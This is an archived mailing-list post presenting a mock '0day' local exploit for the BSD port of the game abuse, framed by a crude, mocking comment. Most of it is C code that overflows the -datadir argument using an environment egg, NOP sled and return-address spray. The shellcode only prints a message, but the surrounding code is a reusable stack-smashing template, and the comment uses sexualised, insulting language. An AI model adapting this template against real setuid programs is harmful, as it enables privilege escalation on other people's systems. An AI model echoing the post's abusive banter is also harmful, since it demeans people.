lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
From: icer at hushmail.com (icer@...hmail.com)
Subject: /usr/ports/games/abuse

/*

hey all.. this is a l33t 0x36 0day exploit by Matrix_DK :)
This should give root, i give root to by the way, on all BSD systems
with abuse installed.

-r-xr-xr-x	1	root	wheel	675344 Jun 18 13:37

hi hi owned by root group wheel.. this is a hacker goodie

I hoped abuse was my favorite game assabuse portet to unix.. so i tried
to load pics of my boyfriend johnlw ass into the game using -datadir...
but the program died???

could this be exploitet???
	
i tried to exploit this myself, but i have no skillz. So i asked the
other gays from 0x36, but there did not know how to do this hardcore
command line overflows.

I asked inv, but he told me to go ass fuck casto... inv is l33t, he knows
many exploit tricks.. he is my hero..
	
So i had to steal some code from 'smashing the stack for fun and profit'
to get it to work...
but now i have become a hacker i am going to send out many advisories
so other people know im a hacker.. and one day maybe  if i am lucky i
can send out some exploits to.. but i have to get some unix, debug and
code skillz first... 

i have made the shellcode myself.. look how l33t it is, it prints 'what
is the matrix ?' :).. that is cool.. us real hackers love the matrix,
 we jerk off to trinity in slow motion, and use nicks from the movie.
	
*/


#include <stdlib.h>

#define DEFAULT_BUFFER_SIZE            350
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

char shellcode[] = "\x31\xc0\x50\x68\x69\x78\x20\x3f\x68\x6d"
		   "\x61\x74\x72\x68\x74\x68\x65\x20\x68\x20"
		   "\x69\x73\x20\x68\x77\x68\x61\x74\x89\xe3"
		   "\x6a\x14\x53\x50\x50\xb0\x04\xcd\x80\x31"
		   "\xc0\xb0\x01\xcd\x80";
    
unsigned long get_esp(void) {
    __asm__("movl %esp,%eax");
}

int main() {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;

addr = get_esp();

buff = malloc(bsize);
egg = malloc(eggsize);

ptr = buff;

addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
                                                             
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;
                                                                    

for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];
                                                                    
      
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
                                                                    
          
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/usr/local/bin/abuse.sdl -datadir $RET");

}




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ